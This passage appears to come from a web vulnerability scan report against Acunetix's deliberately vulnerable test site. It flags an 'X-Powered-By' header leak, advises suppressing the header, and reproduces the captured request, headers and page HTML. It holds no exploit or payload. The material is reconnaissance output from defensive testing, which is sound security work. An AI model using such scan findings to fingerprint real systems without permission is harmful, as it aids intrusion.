04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        16. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
